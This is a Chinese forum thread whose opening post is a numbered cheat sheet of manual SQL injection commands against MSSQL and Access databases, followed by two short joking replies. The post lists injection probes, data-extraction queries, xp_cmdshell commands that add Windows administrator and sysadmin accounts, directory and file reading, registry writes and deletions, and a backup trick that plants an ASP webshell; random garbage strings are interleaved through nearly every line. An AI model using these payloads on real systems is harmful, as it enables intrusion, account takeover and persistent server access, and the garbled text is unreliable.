社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3882阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 $|YIr7?R  
  2.初步判断是否是mssql ;and user>0 Q(KLx)  
0fPqO2  
  3.注入参数是字符'and [查询条件] and ''=' %?EOD=e =  
*<!W k\  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' =`X@+~%-  
#={L!"3?e  
  5.判断数据库系统 D4r5wc%  
FBcF  
  ;and (select count(*) from sysobjects)>0 mssql yX(6C]D  
n]@+<TA<uA  
  ;and (select count(*) from msysobjects)>0 access <nj[=C4v  
v=|BqG`  
OI.2CF  
soZw""|v  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 Xze   
s%z'1KPS  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 6Bp{FOj:Ss  
 v|Tg %  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 UG>OL2m>5  
K`FgU 7g{  
  9.(1)猜字段的ascii值(access) ^[CD-#  
%f&(U/  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 morI'6N  
| pp  @  
  (2)猜字段的ascii值(mssql) ?8(`tS(_?  
S~F:%@,*  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 43-%")bH  
~]/X,Cf  
  10.测试权限结构(mssql) |7/B20  
 #~.i\|VL  
/)de`k"  
7Yxy2[  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9,'5~+7  
8'B\%.+"8e  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Prhq ~oI4  
4T9hT~cT7  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- KX)xCR~  
4W.;p"S2  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 3_T'TzQ u  
C)z[Blt  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- $_Qo  
A0rdQmrOL  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- @WEem(@  
ojVpw4y.  
  ;and 1=(select IS_MEMBER('db_owner'));-- =,[46 ;q  
4 _N)1u !  
i&>,aiH@  
J5Fg]O*  
  11.添加mssql和系统的帐户 '{cN~A2b4  
z[v5hhI)4  
  ;exec master.dbo.sp_addlogin username;-- %1VMwqC]E  
  ;exec master.dbo.sp_password null,username,password;-- ;^DUtr ;  
W'XMC"  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- |-_5ou N.  
45j+n.9=  
  ;exec master.dbo.xp_cmdshell 'net user username password :/vB,JC  
U&3*c+B4  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- hDlk! #*  
R C (v#G  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- AD?DIE(v  
q 8=u.T  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 6ddkUPTF  
/2dK*v0  
m4Wn$Z  
E}@8sY L  
  12.(1)遍历目录 pN0c'COy^  
: 1fik  
  ;create table dirs(paths varchar(100), id int) f aO8 &  
UWn}0:6t  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' mZ;yk(  
cfeX (0  
  ;and (select top 1 paths from dirs)>0 }aNiO85  
38q@4U=aiw  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) DhZtiqL#_  
j|`{ 1`'  
-;P<Q`{I  
N^ D/}n  
  (2)遍历目录 Rc6 )v  
B E"nyTQ  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- uaPBM<  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Msd!4TrBJ  
!W%HAlUAG[  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 X^|oY]D  
zK-hNDFL{  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 \aZ(@eF@@Q  
0='DDy  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Ab2g),;c  
B?0{=u  
j^%i?BWw  
btOTDqG`a  
  13.mssql中的存储过程 =H,cwSE+%  
!7xp<=  
  xp_regenumvalues 注册表根键, 子键 CMBW]b|  
|Lhz^5/  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 oyr2lfz*  
|~HlNUPR  
  xp_regread 根键,子键,键值名 R NA03  
amBz75N{  
  ;exec xp_regread :x{Q  
:):Y6)giBD  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 /XSPVc<  
b(SV_.4,'  
  xp_regwrite 根键,子键, 值名, 值类型, 值 f0D Ch]  
$k`8Zx w  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @^` <iTK&p  
4*+EUJ|  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7@lXN8_f  
]F@md(J  
  xp_regdeletevalue 根键,子键,值名 }a9C /t3  
 Nr[Rp  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \OU+Kl<  
zDl, bLiJ  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 42wcpSp  
Mb>6.l  
5pok%g  
*[SsvlFt  
  14.mssql的backup创建webshell H*\[:tPa  
)2FO+_K?T  
  use model tH'VV-!MZ  
poeXi\e!(  
  create table cmd(str image); OpL 6Y+<  
zJnVO$A'  
  insert into cmd(str) values (''); }=|ZEhtOp  
-1_Z*?=-  
  backup database model to disk='c:\l.asp'; {cv;S2  
_#gsR"FZ$  
7k\7G=  
lXPn]iLJ  
  15.mssql内置函数 ya_'Oz!C  
U2AGH2emw  
  ;and (select @@version)>0 获得Windows的版本号 vLS9V/o  
kW!:bh  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa =P#!>*\ar  
\a6)t%u  
  ;and (select user_name())>0 爆当前系统的连接用户 %f-<ol  
$dnHUBB  
  ;and (select db_name())>0 得到当前连接的数据库 Nb#7&_f=  
lBn*G&(P  
iTt=aQjd  
5HbTgNI  
  16.简洁的webshell Eo Urc9G2  
3E ZwF  
  use model =CVT8(N*  
hX_p5a1t  
  create table cmd(str image); cLU*Tx\  
Q$vr`yV#=6  
  insert into cmd(str) values (''); 9(l'xuX  
=_dd4`G&<  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八